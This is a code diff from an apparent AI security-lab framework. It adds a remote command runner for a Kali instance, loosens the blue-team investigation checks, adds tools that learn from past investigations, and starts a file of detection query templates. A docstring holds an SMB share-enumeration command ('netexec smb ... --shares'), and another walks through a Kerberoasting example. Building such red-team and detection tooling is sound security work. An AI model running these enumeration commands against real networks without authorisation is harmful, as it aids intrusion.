+ working_directory: str = "/tmp", # noqa: S108 # nosec B108
+ ) -> CommandResult:
+ """Execute a command on the remote instance via SSM.
+
+ Args:
+ command: Command string or list of command parts
+ timeout_seconds: Maximum time to wait for command completion
+ working_directory: Directory to execute command in
+
+ Returns:
+ CommandResult with stdout, stderr, and return code
+ """
+ command_str = " ".join(command) if isinstance(command, list) else command
+
+ # Wrap command to capture exit code and handle errors
+ wrapped_command = f"""
+cd {working_directory}
+{command_str}
+EXIT_CODE=$?
+exit $EXIT_CODE
+"""
+
+ try:
+ logger.debug(f"SSM executing: {command_str[:100]}...")
+
+ response = self.ssm_client.send_command(
+ InstanceIds=[self.instance_id],
+ DocumentName="AWS-RunShellScript",
+ Parameters={"commands": [wrapped_command]},
+ TimeoutSeconds=timeout_seconds,
+ )
+
+ command_id = response["Command"]["CommandId"]
+ logger.debug(f"SSM command ID: {command_id}")
+
+ # Wait for command to complete
+ return self._wait_for_command(command_id, timeout_seconds)
+
+ except SSOTokenExpiredError:
+ # Re-raise SSO errors without wrapping
+ raise
+ except (TokenRetrievalError, SSOTokenLoadError) as e:
+ self._handle_sso_error(e)
+ except ClientError as e:
+ error_str = str(e).lower()
+ if "token" in error_str and ("expired" in error_str or "sso" in error_str):
+ self._handle_sso_error(e)
+ error_msg = f"SSM command failed: {e}"
+ logger.error(error_msg)
+ return CommandResult(
+ stdout="",
+ stderr=error_msg,
+ return_code=1,
+ success=False,
+ )
+ except Exception as e:
+ # Catch any other SSO-related errors
+ error_str = str(e).lower()
+ if "token" in error_str and ("expired" in error_str or "sso" in error_str):
+ self._handle_sso_error(e)
+ raise
+
+ def _wait_for_command(
+ self,
+ command_id: str,
+ timeout_seconds: int,
+ ) -> CommandResult:
+ """Wait for SSM command to complete and return result."""
+ start_time = time.time()
+ poll_interval = 2 # seconds
+
+ while True:
+ elapsed = time.time() - start_time
+ if elapsed > timeout_seconds:
+ return CommandResult(
+ stdout="",
+ stderr=f"Command timed out after {timeout_seconds} seconds",
+ return_code=124,
+ success=False,
+ )
+
+ try:
+ response = self.ssm_client.get_command_invocation(
+ CommandId=command_id,
+ InstanceId=self.instance_id,
+ )
+
+ status = response.get("Status", "")
+
+ if status in ("Success", "Failed", "Cancelled", "TimedOut"):
+ stdout = response.get("StandardOutputContent", "")
+ stderr = response.get("StandardErrorContent", "")
+ return_code = response.get("ResponseCode", -1)
+
+ # Handle None return code
+ if return_code is None:
+ return_code = 0 if status == "Success" else 1
+
+ success = status == "Success" and return_code == 0
+
+ logger.debug(
+ f"SSM command completed: status={status}, return_code={return_code}"
+ )
+
+ return CommandResult(
+ stdout=stdout,
+ stderr=stderr,
+ return_code=return_code,
+ success=success,
+ )
+
+ # Still pending, wait and retry
+ time.sleep(poll_interval)
+
+ except SSOTokenExpiredError:
+ raise
+ except (TokenRetrievalError, SSOTokenLoadError) as e:
+ self._handle_sso_error(e)
+ except ClientError as e:
+ error_str = str(e).lower()
+ if "token" in error_str and ("expired" in error_str or "sso" in error_str):
+ self._handle_sso_error(e)
+ if "InvocationDoesNotExist" in str(e):
+ # Command not yet visible, wait and retry
+ time.sleep(poll_interval)
+ continue
+ raise
+ except Exception as e:
+ error_str = str(e).lower()
+ if "token" in error_str and ("expired" in error_str or "sso" in error_str):
+ self._handle_sso_error(e)
+ raise
+
+
+# Global executor instance (lazy-loaded)
+_executor: SSMExecutor | None = None
+
+
+def get_executor() -> SSMExecutor:
+ """Get or create the global SSM executor instance."""
+ global _executor
+ if _executor is None:
+ _executor = SSMExecutor()
+ return _executor
+
+
+def validate_sso_credentials(profile: str = "lab") -> bool:
+ """Validate that SSO credentials are available and not expired.
+
+ Call this at the start of an operation to fail fast if credentials
+ are invalid, rather than failing mid-operation.
+
+ Args:
+ profile: AWS profile name to validate
+
+ Returns:
+ True if credentials are valid
+
+ Raises:
+ SSOTokenExpiredError: If SSO token is expired or invalid
+ """
+ try:
+ session = boto3.Session(profile_name=profile)
+ credentials = session.get_credentials()
+ if credentials is None:
+ raise SSOTokenExpiredError( # noqa: TRY301
+ f"No credentials available for profile '{profile}'. "
+ f"Run: aws sso login --profile {profile}"
+ )
+ # Force credential resolution to validate token
+ credentials.get_frozen_credentials()
+ logger.debug(f"SSO credentials validated for profile '{profile}'")
+ return True
+ except (TokenRetrievalError, SSOTokenLoadError) as e:
+ raise SSOTokenExpiredError(
+ f"AWS SSO token expired for profile '{profile}'. Run: aws sso login --profile {profile}"
+ ) from e
+ except Exception as e:
+ error_str = str(e).lower()
+ if "token" in error_str and ("expired" in error_str or "sso" in error_str):
+ raise SSOTokenExpiredError(
+ f"AWS SSO token expired for profile '{profile}'. "
+ f"Run: aws sso login --profile {profile}"
+ ) from e
+ raise
+
+
+def reset_executor() -> None:
+ """Reset the global executor instance.
+
+ Call this after SSO token refresh to force re-authentication.
+ """
+ global _executor
+ _executor = None
+ logger.info("SSM executor reset - will re-authenticate on next use")
+
+
+def run_remote(
+ command: str | list[str],
+ timeout_seconds: int = 300,
+ working_directory: str = "/tmp", # noqa: S108 # nosec B108
+) -> CommandResult:
+ """Execute a command on the remote Kali instance.
+
+ This is a convenience function that uses the global executor.
+
+ Args:
+ command: Command string or list of command parts
+ timeout_seconds: Maximum time to wait
+ working_directory: Directory to execute in
+
+ Returns:
+ CommandResult with stdout, stderr, and return code
+
+ Example:
+ >>> result = run_remote("netexec smb 10.1.2.219 --shares")
+ >>> print(result.stdout)
+ """
+ executor = get_executor()
+ return executor.run_command(command, timeout_seconds, working_directory)
diff --git a/src/ares/integrations/mitre.py b/src/ares/integrations/mitre.py
index 46c7ea70..e3fef207 100644
--- a/src/ares/integrations/mitre.py
+++ b/src/ares/integrations/mitre.py
@@ -103,7 +103,6 @@ async def load(self) -> None:
response.raise_for_status()
bundle = response.json()
- # Parse STIX objects
for obj in bundle.get("objects", []):
obj_type = obj.get("type")
@@ -131,12 +130,10 @@ def _parse_technique(self, obj: dict) -> None:
if not technique_id:
return
- # Get tactic from kill chain
kill_chain = obj.get("kill_chain_phases", [])
tactic_shortname = kill_chain[0]["phase_name"] if kill_chain else "unknown"
tactic_id = self.TACTIC_MAP.get(tactic_shortname, "")
- # Check if subtechnique
is_subtechnique = obj.get("x_mitre_is_subtechnique", False)
parent = None
if is_subtechnique and "." in technique_id:
diff --git a/src/ares/main.py b/src/ares/main.py
index b5071740..eb452fa5 100644
--- a/src/ares/main.py
+++ b/src/ares/main.py
@@ -87,7 +87,6 @@ async def main(
args = args or Args()
dn_args = dn_args or DreadnodeArgs()
- # Get API keys from environment if not provided
grafana_api_key = args.grafana_api_key or os.getenv("GRAFANA_API_KEY", "")
dreadnode_token = dn_args.token or os.getenv("DREADNODE_API_KEY", "")
@@ -116,7 +115,6 @@ async def main(
from ares.integrations.mitre import MITREAttackClient
from ares.tools.blue import GrafanaTools
- # Initialize MITRE client
logger.info("Loading MITRE ATT&CK data from STIX repository...")
mitre_client = MITREAttackClient()
await mitre_client.load()
@@ -129,7 +127,6 @@ async def main(
report_dir.mkdir(parents=True, exist_ok=True)
logger.info(f"Reports: {report_dir}")
- # Initialize orchestrator
orchestrator = InvestigationOrchestrator(
model=args.model,
grafana_url=args.grafana_url,
@@ -139,7 +136,6 @@ async def main(
max_steps=args.max_steps,
)
- # Initialize Grafana client for polling
grafana = GrafanaTools(
base_url=args.grafana_url,
api_key=grafana_api_key,
@@ -158,7 +154,6 @@ async def main(
try:
while True:
try:
- # Poll for firing alerts
alerts = await grafana.get_firing_alerts()
for alert in alerts:
@@ -195,7 +190,6 @@ async def main(
except Exception as e:
logger.error(f"Investigation failed: {e}")
- dn.log_metric("investigation_failed", 1, mode="count")
# If running in once mode, exit after processing current alerts
if args.once:
@@ -245,7 +239,6 @@ async def investigate_alert(
args = args or Args()
dn_args = dn_args or DreadnodeArgs()
- # Parse alert
if alert_json.startswith("{"):
alert = json.loads(alert_json)
else:
@@ -267,7 +260,6 @@ async def investigate_alert(
from ares.agents.blue import InvestigationOrchestrator
from ares.integrations.mitre import MITREAttackClient
- # Load MITRE data
logger.info("Loading MITRE ATT&CK data...")
mitre_client = MITREAttackClient()
await mitre_client.load()
@@ -351,7 +343,6 @@ async def redteam(
from ares.agents.red import RedTeamOrchestrator
from ares.integrations.mitre import MITREAttackClient
- # Load MITRE data
logger.info("Loading MITRE ATT&CK data...")
mitre_client = MITREAttackClient()
await mitre_client.load()
@@ -364,7 +355,6 @@ async def redteam(
report_dir.mkdir(parents=True, exist_ok=True)
logger.info(f"Reports: {report_dir}")
- # Create orchestrator
orchestrator = RedTeamOrchestrator(
model=args.model,
mitre_client=mitre_client,
diff --git a/src/ares/reports/redteam.py b/src/ares/reports/redteam.py
index 507cce05..3d31e3e0 100644
--- a/src/ares/reports/redteam.py
+++ b/src/ares/reports/redteam.py
@@ -30,11 +30,9 @@ def generate(self, state: RedTeamState) -> str:
Returns:
Complete markdown report as a string.
"""
- # Calculate duration
duration = datetime.now(timezone.utc) - state.started_at
- duration_str = str(duration).split(".")[0] # Remove microseconds
+ duration_str = str(duration).split(".")[0]
- # Generate executive summary
executive_summary = self._generate_executive_summary(state)
# Render the report using the template
diff --git a/src/ares/tools/blue/__init__.py b/src/ares/tools/blue/__init__.py
index ccbf7e4e..52b04b47 100644
--- a/src/ares/tools/blue/__init__.py
+++ b/src/ares/tools/blue/__init__.py
@@ -3,14 +3,18 @@
from ares.tools.blue.actions import CompletionTools, escalate_investigation
from ares.tools.blue.grafana import GrafanaTools, connect_grafana_mcp
from ares.tools.blue.investigation import InvestigationTools, QuestionEngineTools
+from ares.tools.blue.learning import LearningTools
from ares.tools.blue.observability import LokiTools, PrometheusTools
+from ares.tools.blue.query_templates import QueryTemplateTools
__all__ = [
"CompletionTools",
"GrafanaTools",
"InvestigationTools",
+ "LearningTools",
"LokiTools",
"PrometheusTools",
+ "QueryTemplateTools",
"QuestionEngineTools",
"connect_grafana_mcp",
"escalate_investigation",
diff --git a/src/ares/tools/blue/actions.py b/src/ares/tools/blue/actions.py
index c9ff3711..d053ee93 100644
--- a/src/ares/tools/blue/actions.py
+++ b/src/ares/tools/blue/actions.py
@@ -26,130 +26,139 @@ def set_state(self, state: InvestigationState):
async def complete_investigation(
self,
summary: str,
- attack_synopsis: str,
- recommendations: list[str],
- confidence: str,
- affected_hosts: list[str],
- affected_users: list[str],
- attack_timeframe: str,
+ attack_synopsis: str | None = None,
+ recommendations: list[str] | None = None,
) -> str:
"""Complete the investigation and signal report generation.
- REQUIRED before calling:
- 1. Must have transitioned through lateral stage
- 2. Must have investigated at least one host
- 3. Must provide specific affected hosts/users
- 4. Must provide attack timeframe
+ Call this when you have:
+ - Answered the key questions about the alert
+ - Recorded evidence for your findings
+ - Built a timeline of events
+ - Identified affected hosts/users
Args:
- summary: Executive summary (2-3 sentences).
- attack_synopsis: Detailed description of the attack chain.
- recommendations: List of recommended actions.
- confidence: Overall confidence level (high/medium/low with explanation).
- affected_hosts: List of hosts involved in the attack (IPs or hostnames).
- affected_users: List of user accounts involved.
- attack_timeframe: Time range of the attack (e.g., "2024-01-15 14:30-15:45 UTC").
+ summary: Executive summary of the investigation including:
+ - What attack/activity was detected
+ - Key findings and evidence
+ - Affected hosts and users
+ - Confidence level (high/medium/low)
+ attack_synopsis: Narrative describing the attack chain chronologically.
+ Should include specific hostnames, usernames, IPs, and timestamps.
+ Explains how the attacker progressed through the attack.
+ recommendations: List of recommended actions to take. Should include
+ both immediate response actions and long-term improvements.
+ Check the alert's 'response' annotation for expert guidance.
Returns:
- Confirmation message or error if validation fails.
+ Confirmation message.
Example:
>>> await complete_investigation(
- ... summary="Detected Kerberoasting attack targeting service accounts.",
- ... attack_synopsis="Attacker performed AS-REP roasting against samwell.tarly...",
- ... recommendations=["Reset passwords for samwell.tarly and jeor.mormont"],
- ... confidence="High - Multiple corroborating Kerberos events",
- ... affected_hosts=["10.0.4.186", "WINTERFELL.north.sevenkingdoms.local"],
- ... affected_users=["samwell.tarly", "jeor.mormont"],
- ... attack_timeframe="2024-01-08 04:37-04:43 UTC"
+ ... summary="Detected Kerberoasting attack targeting service accounts. "
+ ... "User samwell.tarly requested TGS tickets with RC4 encryption "
+ ... "for multiple SPNs from host 10.0.4.186. Confidence: High.",
+ ... attack_synopsis="At 14:30 UTC, user samwell.tarly from 10.0.4.186 "
+ ... "began requesting TGS tickets for service accounts. "
+ ... "12 tickets requested with RC4 encryption over 5 minutes.",
+ ... recommendations=[
+ ... "Reset service account passwords immediately",
+ ... "Enable AES-only Kerberos encryption",
+ ... "Review service account permissions"
+ ... ]
... )
'Investigation completed. Report will be generated.'
"""
- errors = []
-
- # Validate state exists
if not self.state:
return "ERROR: No investigation state. Cannot complete."
- # Validate lateral investigation was performed
+ # Log stage info
if self.state.stage.value not in ["lateral", "synthesis"]:
- errors.append(
- f"ERROR: Must reach 'lateral' stage before completion. "
- f"Current stage: {self.state.stage.value}. "
- f"Call transition_stage('lateral') after investigating scope."
- )
-
- # Validate hosts were investigated
- if not self.state.queried_hosts and not affected_hosts:
- errors.append(
- "ERROR: No hosts investigated. Use track_host_investigation() "
- "to investigate affected hosts before completing."
- )
-
- # Validate affected_hosts is not empty
- if not affected_hosts:
- errors.append(
- "ERROR: affected_hosts is required. Provide the list of "
- "hosts/IPs involved in the attack."
- )
-
- # Validate affected_users is not empty
- if not affected_users:
- errors.append(
- "ERROR: affected_users is required. Provide the list of "
- "user accounts involved in the attack."
- )
-
- # Validate attack_timeframe is specific
- if not attack_timeframe or len(attack_timeframe) < 10:
- errors.append(
- "ERROR: attack_timeframe must be specific (e.g., '2024-01-08 04:37-04:43 UTC'). "
- "This should reflect the ACTUAL event timestamps from your investigation."
- )
-
- # Validate synopsis is substantive
- if len(attack_synopsis) < 100:
- errors.append(
- "ERROR: attack_synopsis too short. Provide a detailed description "
- "of the attack chain including: initial access, techniques used, "
- "and impact."
- )
-
- # Validate evidence was collected
- if len(self.state.evidence) < 2:
- errors.append(
- f"ERROR: Insufficient evidence ({len(self.state.evidence)} items). "
- "Continue investigation to gather more evidence."
- )
-
- # If errors, return them all
- if errors:
- dn.log_metric("completion_validation_failed", 1)
- return "\n\n".join(errors)
-
- # All validations passed
+ logger.info(f"Investigation completed at '{self.state.stage.value}' stage")
+
+ # Store attack synopsis if provided
+ if attack_synopsis:
+ self.state.attack_synopsis = attack_synopsis
+ logger.info(f"Attack synopsis recorded: {attack_synopsis[:100]}...")
+
+ # Process recommendations
+ if recommendations:
+ self.state.recommendations.extend(recommendations)
+ logger.info(f"Added {len(recommendations)} recommendations")
+
+ # Auto-extract recommendations from alert annotations if none provided
+ if not self.state.recommendations:
+ alert_annotations = self.state.alert.get("annotations", {})
+ response_guidance = alert_annotations.get("response", "")
+ if response_guidance:
+ import re
+
+ steps = re.split(r"\d+\.\s+", response_guidance)
+ extracted_recs = [s.strip() for s in steps if s.strip()]
+ if extracted_recs:
+ self.state.recommendations.extend(extracted_recs)
+ logger.info(f"Auto-extracted {len(extracted_recs)} recommendations from alert")
+
+ # Auto-generate synopsis if not provided and we have evidence
+ if not self.state.attack_synopsis and self.state.evidence:
+ self._generate_fallback_synopsis()
+
+ # Record completion
dn.log_metric("investigation_completed", 1)
dn.log_output(
"completion_summary",
{
"summary": summary,
- "attack_synopsis": attack_synopsis,
- "recommendations": recommendations,
- "confidence": confidence,
- "affected_hosts": affected_hosts,
- "affected_users": affected_users,
- "attack_timeframe": attack_timeframe,
+ "attack_synopsis": self.state.attack_synopsis,
+ "recommendations": self.state.recommendations,
"evidence_count": len(self.state.evidence),
"timeline_events": len(self.state.timeline),
"hosts_investigated": list(self.state.queried_hosts),
"users_investigated": list(self.state.queried_users),
+ "techniques_identified": list(self.state.identified_techniques),
},
)
- logger.success("Investigation completed")
+ logger.success(f"Investigation completed: {summary[:100]}...")
return "Investigation completed. Report will be generated."
+ def _generate_fallback_synopsis(self) -> None:
+ """Generate a basic synopsis from evidence if none provided."""
+ if not self.state:
+ return
+
+ parts = []
+
+ alert_name = self.state.alert.get("labels", {}).get("alertname", "Unknown alert")
+ severity = self.state.alert.get("labels", {}).get("severity", "unknown")
+ starts_at = self.state.alert.get("startsAt", "")
+
+ parts.append(f"{severity.upper()} alert: {alert_name}")
+
+ if starts_at:
+ parts.append(f"Alert triggered at {starts_at}.")
+
+ if self.state.identified_techniques:
+ techniques = ", ".join(list(self.state.identified_techniques)[:3])
+ parts.append(f"MITRE techniques identified: {techniques}.")
+
+ if self.state.queried_hosts:
+ hosts = ", ".join(list(self.state.queried_hosts)[:3])
+ parts.append(f"Hosts involved: {hosts}.")
+
+ if self.state.queried_users:
+ users = ", ".join(list(self.state.queried_users)[:3])
+ parts.append(f"Users involved: {users}.")
+
+ if self.state.evidence:
+ parts.append(f"{len(self.state.evidence)} evidence items collected.")
+ high_level = [e for e in self.state.evidence if e.pyramid_level.value >= 5]
+ if high_level:
+ parts.append(f"{len(high_level)} high-value indicators (tools/TTPs) identified.")
+
+ self.state.attack_synopsis = " ".join(parts)
+
@dn.tool() # type: ignore[untyped-decorator]
async def escalate_investigation(
diff --git a/src/ares/tools/blue/grafana.py b/src/ares/tools/blue/grafana.py
index bde0bee1..c466f3d9 100644
--- a/src/ares/tools/blue/grafana.py
+++ b/src/ares/tools/blue/grafana.py
@@ -4,6 +4,7 @@
import shutil
import subprocess # nosec B404
from pathlib import Path
+from typing import Any
import dreadnode as dn
import httpx
@@ -130,7 +131,7 @@ def find_mcp_grafana() -> str:
async def connect_grafana_mcp(
grafana_url: str | None = None,
grafana_api_key: str | None = None,
-): # type: ignore[no-untyped-def]
+) -> Any:
"""
Connect to Grafana MCP server via Rigging.
diff --git a/src/ares/tools/blue/investigation.py b/src/ares/tools/blue/investigation.py
index 187ed394..3dd7f841 100644
--- a/src/ares/tools/blue/investigation.py
+++ b/src/ares/tools/blue/investigation.py
@@ -32,14 +32,20 @@ class InvestigationTools(Toolset): # type: ignore[misc]
Attributes:
state: Current investigation state being managed.
+ mitre_client: MITRE ATT&CK client for technique lookups.
"""
state: InvestigationState | None = None
+ mitre_client: MITREAttackClient | None = None
def set_state(self, state: InvestigationState):
"""Set the investigation state (called by orchestrator)."""
self.state = state
+ def set_mitre_client(self, client: MITREAttackClient):
+ """Set the MITRE client for technique lookups."""
+ self.mitre_client = client
+
@dn.tool_method # type: ignore[untyped-decorator]
def record_evidence(
self,
@@ -116,6 +122,8 @@ def record_evidence(
if mitre_techniques:
self.state.identified_techniques.update(mitre_techniques)
+ # Look up technique names and tactics
+ self._resolve_technique_metadata(mitre_techniques)
dn.log_output(f"evidence_{evidence_id}", ev.to_dict())
dn.log_metric("evidence_count", 1, mode="count")
@@ -127,6 +135,24 @@ def record_evidence(
return evidence_id
+ def _resolve_technique_metadata(self, technique_ids: list[str]) -> None:
+ """Look up and cache technique names and tactics."""
+ if not self.state or not self.mitre_client:
+ return
+
+ for tech_id in technique_ids:
+ # Skip if already resolved
+ if tech_id in self.state.technique_names:
+ continue
+
+ technique = self.mitre_client.get_technique(tech_id)
+ if technique:
+ self.state.technique_names[tech_id] = technique.name
+ self.state.technique_to_tactic[tech_id] = technique.tactic or "Unknown"
+ if technique.tactic:
+ self.state.identified_tactics.add(technique.tactic)
+ logger.debug(f"Resolved technique {tech_id}: {technique.name} ({technique.tactic})")
+
@dn.tool_method # type: ignore[untyped-decorator]
def add_timeline_event(
self,
diff --git a/src/ares/tools/blue/learning.py b/src/ares/tools/blue/learning.py
new file mode 100644
index 00000000..accc04d9
--- /dev/null
+++ b/src/ares/tools/blue/learning.py
@@ -0,0 +1,343 @@
+"""
+Learning tools for querying past investigations and improving detection.
+
+These tools allow the agent to learn from previous investigations
+and apply that knowledge to new alerts.
+"""
+
+from typing import Any
+
+import dreadnode as dn
+from dreadnode.agent.tools.base import Toolset
+from loguru import logger
+
+from ares.core.persistence import InvestigationStore, get_investigation_store
+
+
+class LearningTools(Toolset): # type: ignore[misc]
+ """Tools for learning from past investigations.
+
+ Provides access to historical investigation data, query effectiveness
+ statistics, and false positive patterns.
+
+ Attributes:
+ store: Optional investigation store (uses global store if not provided).
+ """
+
+ store: InvestigationStore | None = None
+
+ def get_store(self) -> InvestigationStore:
+ """Get the investigation store, initializing if needed."""
+ if self.store is None:
+ self.store = get_investigation_store()
+ return self.store
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def find_similar_investigations(
+ self,
+ alert_name: str | None = None,
+ technique_id: str | None = None,
+ severity: str | None = None,
+ limit: int = 5,
+ ) -> dict[str, Any]:
+ """Find similar past investigations to learn from.
+
+ Use this at the start of an investigation to see how similar alerts
+ were handled in the past and what queries were effective.
+
+ Args:
+ alert_name: Name of the current alert
+ technique_id: MITRE ATT&CK technique ID (e.g., "T1003.001")
+ severity: Alert severity level
+ limit: Maximum number of results (default 5)
+
+ Returns:
+ Dictionary containing similar investigations and their outcomes
+ """
+ dn.log_metric("learning_similar_lookup", 1, mode="count")
+ logger.info(
+ f"Looking up similar investigations: alert={alert_name}, technique={technique_id}"
+ )
+
+ similar = self.get_store().find_similar_investigations(
+ alert_name=alert_name,
+ technique_id=technique_id,
+ severity=severity,
+ limit=limit,
+ )
+
+ if not similar:
+ return {
+ "found": False,
+ "message": "No similar investigations found. This may be a new alert type.",
+ "investigations": [],
+ }
+
+ results = []
+ for sim in similar:
+ inv = sim.investigation
+ results.append(
+ {
+ "investigation_id": inv.investigation_id,
+ "alert_name": inv.alert_name,
+ "technique_id": inv.technique_id,
+ "similarity_score": sim.similarity_score,
+ "matching_factors": sim.matching_factors,
+ "outcome": {
+ "status": inv.status,
+ "evidence_count": inv.evidence_count,
+ "highest_pyramid_level": inv.highest_pyramid_level,
+ "is_true_positive": inv.is_true_positive,
+ },
+ "duration_seconds": inv.duration_seconds,
+ "effective_queries": inv.effective_queries[:3], # Top 3 effective queries
+ "techniques_identified": inv.techniques_identified,
+ }
+ )
+
+ # Add summary guidance
+ completed_count = sum(1 for s in similar if s.investigation.status == "completed")
+ avg_evidence = sum(s.investigation.evidence_count for s in similar) / len(similar)
+
+ true_positive_count = sum(1 for s in similar if s.investigation.is_true_positive is True)
+ false_positive_count = sum(1 for s in similar if s.investigation.is_true_positive is False)
+
+ return {
+ "found": True,
+ "count": len(results),
+ "summary": {
+ "completion_rate": f"{completed_count / len(similar) * 100:.0f}%",
+ "avg_evidence_count": round(avg_evidence, 1),
+ "true_positives": true_positive_count,
+ "false_positives": false_positive_count,
+ },
+ "investigations": results,
+ "guidance": self._generate_guidance(similar),
+ }
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def get_effective_queries(
+ self,
+ alert_name: str | None = None,
+ limit: int = 10,
+ ) -> dict[str, Any]:
+ """Get the most effective queries for this type of alert.
+
+ Returns queries that have historically produced evidence,
+ ranked by effectiveness.
+
+ Args:
+ alert_name: Filter by alert type (optional)
+ limit: Maximum number of queries to return
+
+ Returns:
+ Dictionary with effective queries and their statistics
+ """
+ dn.log_metric("learning_query_lookup", 1, mode="count")
+ logger.info(f"Looking up effective queries for alert: {alert_name}")
+
+ effective = self.get_store().get_effective_queries(
+ alert_type=alert_name,
+ min_evidence_rate=0.2, # At least 20% evidence rate
+ limit=limit,
+ )
+
+ if not effective:
+ return {
+ "found": False,
+ "message": "No query effectiveness data available yet.",
+ "queries": [],
+ }
+
+ queries = []
+ for qe in effective:
+ queries.append(
+ {
+ "query_pattern": qe.query_pattern,
+ "total_uses": qe.total_executions,
+ "success_rate": f"{qe.success_rate * 100:.0f}%",
+ "evidence_rate": f"{qe.evidence_rate * 100:.0f}%",
+ "used_for_alerts": qe.alert_types[:5], # Limit alert types shown
+ }
+ )
+
+ return {
+ "found": True,
+ "count": len(queries),
+ "queries": queries,
+ "recommendation": (
+ "Use these queries as starting points. They have historically "
+ "produced evidence for similar alerts. Adapt the patterns to "
+ "your specific investigation context."
+ ),
+ }
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def check_false_positive_pattern(
+ self,
+ alert_name: str,
+ alert_fingerprint: str | None = None,
+ ) -> dict[str, Any]:
+ """Check if this alert matches a known false positive pattern.
+
+ Use this to quickly identify if an alert is likely a false positive
+ based on historical data.
+
+ Args:
+ alert_name: Name of the alert
+ alert_fingerprint: Unique fingerprint/rule UID of the alert
+
+ Returns:
+ Dictionary with false positive assessment
+ """
+ dn.log_metric("learning_fp_check", 1, mode="count")
+ logger.info(f"Checking false positive patterns for: {alert_name}")
+
+ # Check for similar false positives
+ similar = self.get_store().find_similar_investigations(
+ alert_name=alert_name,
+ alert_fingerprint=alert_fingerprint,
+ limit=20,
+ )
+
+ if not similar:
+ return {
+ "is_known_pattern": False,
+ "message": "No historical data for this alert type.",
+ "confidence": "low",
+ }
+
+ # Count true/false positives
+ true_positives = sum(1 for s in similar if s.investigation.is_true_positive is True)
+ false_positives = sum(1 for s in similar if s.investigation.is_true_positive is False)
+ unlabeled = len(similar) - true_positives - false_positives
+
+ # Calculate false positive likelihood
+ if true_positives + false_positives > 0:
+ fp_rate = false_positives / (true_positives + false_positives)
+ else:
+ fp_rate = 0.0
+
+ # Check known FP patterns
+ fp_patterns = self.get_store().get_false_positive_patterns(min_occurrences=2)
+ matching_pattern = None
+ for pattern in fp_patterns:
+ if pattern["alert_name"] == alert_name:
+ matching_pattern = pattern
+ break
+
+ if matching_pattern and matching_pattern["occurrences"] >= 3:
+ return {
+ "is_known_pattern": True,
+ "confidence": "high",
+ "false_positive_rate": f"{fp_rate * 100:.0f}%",
+ "occurrences": matching_pattern["occurrences"],
+ "pattern": matching_pattern,
+ "recommendation": (
+ "This alert has been marked as false positive multiple times. "
+ "Consider quick validation and early completion if indicators match."
+ ),
+ }
+
+ if fp_rate > 0.7:
+ return {
+ "is_known_pattern": True,
+ "confidence": "medium",
+ "false_positive_rate": f"{fp_rate * 100:.0f}%",
+ "true_positives": true_positives,
+ "false_positives": false_positives,
+ "recommendation": (
+ "This alert type has a high false positive rate. "
+ "Prioritize quick validation queries before deep investigation."
+ ),
+ }
+
+ return {
+ "is_known_pattern": False,
+ "confidence": "medium" if unlabeled < len(similar) / 2 else "low",
+ "false_positive_rate": f"{fp_rate * 100:.0f}%",
+ "true_positives": true_positives,
+ "false_positives": false_positives,
+ "unlabeled": unlabeled,
+ "message": "No strong false positive pattern detected. Proceed with normal investigation.",
+ }
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def get_investigation_statistics(self) -> dict[str, Any]:
+ """Get overall investigation statistics.
+
+ Returns aggregated statistics about past investigations,
+ useful for understanding overall detection performance.
+
+ Returns:
+ Dictionary with investigation statistics
+ """
+ dn.log_metric("learning_stats_lookup", 1, mode="count")
+
+ stats = self.get_store().get_statistics()
+
+ return {
+ "total_investigations": stats["total_investigations"],
+ "status_distribution": stats["status_distribution"],
+ "performance": {
+ "avg_evidence_count": stats["avg_evidence_count"],
+ "avg_pyramid_level": stats["avg_pyramid_level"],
+ "avg_duration_seconds": stats["avg_duration_seconds"],
+ },
+ "query_insights": {
+ "total_query_patterns": stats["total_query_patterns"],
+ "avg_evidence_rate": f"{stats['avg_query_evidence_rate']}%",
+ },
+ "labeling": stats["labeling"],
+ }
+
+ def _generate_guidance(self, similar: list) -> str:
+ """Generate investigation guidance based on similar investigations."""
+ if not similar:
+ return "No historical guidance available."
+
+ # Find most successful investigation
+ completed = [s for s in similar if s.investigation.status == "completed"]
+ if not completed:
+ return "Previous investigations of this type did not complete successfully."
+
+ # Get investigation with most evidence
+ best = max(completed, key=lambda x: x.investigation.evidence_count)
+
+ guidance_parts = []
+
+ if best.investigation.evidence_count > 0:
+ guidance_parts.append(
+ f"Past investigations found an average of "
+ f"{sum(s.investigation.evidence_count for s in completed) / len(completed):.1f} "
+ f"evidence items."
+ )
+
+ if best.investigation.effective_queries:
+ guidance_parts.append(
+ f"Effective queries to try: {', '.join(best.investigation.effective_queries[:2])}"
+ )
+
+ # Check for common outcomes
+ true_positive_rate = (
+ sum(1 for s in similar if s.investigation.is_true_positive is True) / len(similar) * 100
+ if similar
+ else 0
+ )
+
+ if true_positive_rate > 70:
+ guidance_parts.append(
+ f"This alert type has a {true_positive_rate:.0f}% true positive rate - "
+ "likely worth thorough investigation."
+ )
+ elif true_positive_rate < 30:
+ guidance_parts.append(
+ f"This alert type has only a {true_positive_rate:.0f}% true positive rate - "
+ "consider quick validation first."
+ )
+
+ return (
+ " ".join(guidance_parts)
+ if guidance_parts
+ else "Proceed with standard investigation approach."
+ )
diff --git a/src/ares/tools/blue/observability.py b/src/ares/tools/blue/observability.py
index 8c405ddf..380aa3a5 100644
--- a/src/ares/tools/blue/observability.py
+++ b/src/ares/tools/blue/observability.py
@@ -76,7 +76,6 @@ async def query_logs(
query_logs_around_timestamp: For time-window queries around a specific event.
get_label_values: For discovering available log labels.
"""
- # Validate query to prevent empty-compatible regex errors
if '=~".*"' in logql or "=~'.*'" in logql:
return {
"status": "error",
@@ -109,7 +108,6 @@ async def query_logs(
except httpx.HTTPError as e:
logger.error(f"Loki query failed: {e}")
logger.error(f"Failed query was: {logql}")
- # Return detailed error for the agent to learn from
return {
"status": "error",
"error": str(e),
@@ -185,7 +183,6 @@ async def query_logs_progressive(
limit=limit,
)
- # Check if we got results
data = result.get("data", {})
results = data.get("result", [])
if results:
diff --git a/src/ares/tools/blue/query_templates.py b/src/ares/tools/blue/query_templates.py
new file mode 100644
index 00000000..105f0738
--- /dev/null
+++ b/src/ares/tools/blue/query_templates.py
@@ -0,0 +1,1966 @@
+"""Pre-built query templates for detecting red team attack patterns.
+
+Provides ready-to-use LogQL queries mapped to MITRE ATT&CK techniques,
+specifically designed to detect attacks performed by the Ares red team agent.
+"""
+
+from datetime import datetime, timedelta, timezone
+from typing import Any
+
+import dreadnode as dn
+import httpx
